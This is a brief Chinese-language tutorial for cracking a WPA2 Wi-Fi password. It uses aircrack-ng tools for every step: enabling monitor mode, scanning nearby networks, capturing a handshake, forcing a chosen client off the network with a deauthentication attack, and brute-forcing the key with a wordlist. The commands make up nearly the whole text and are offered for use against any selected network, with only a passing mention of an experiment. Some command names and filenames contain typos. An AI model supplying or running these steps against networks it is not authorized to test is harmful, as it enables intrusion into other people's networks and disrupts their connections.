一、
查看网络网卡信息
iwconfig
没有无线网卡的话是
有无线网卡的话是
二、
开启我i线网卡的侦听模式
airmon-ng start wlan0
如果没有出现侦听数据,重启服务
airmon-ng check kill
三、
侦听附近WiFi信息号
airodump-ng wlan0mon
四、
选择你要破解的无线网络,抓握手包
airodump -c 6(信道号ch)--bssid x:x:x:x:x:x -w woshou wlan0mon
如果抓不到握手报文,需要模拟station,进行攻击
aireplay-ng -0 10 -a bssid -c station mac wlan0mon
aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主机的mac地址 wlan0mon
五、
vim passwf.txt(这是一个密码包,这是一个实验,所以密码包自己写,当然可以在网上下载大的密码包)
aircrack-ng -a2 -b ssid(mac地址) -w passwd.txt woshou.cap
-a2 是加密的协议,在你抓握手包的中有显示,现在我i线网卡一般都是WPA2
KEY FOUND!!!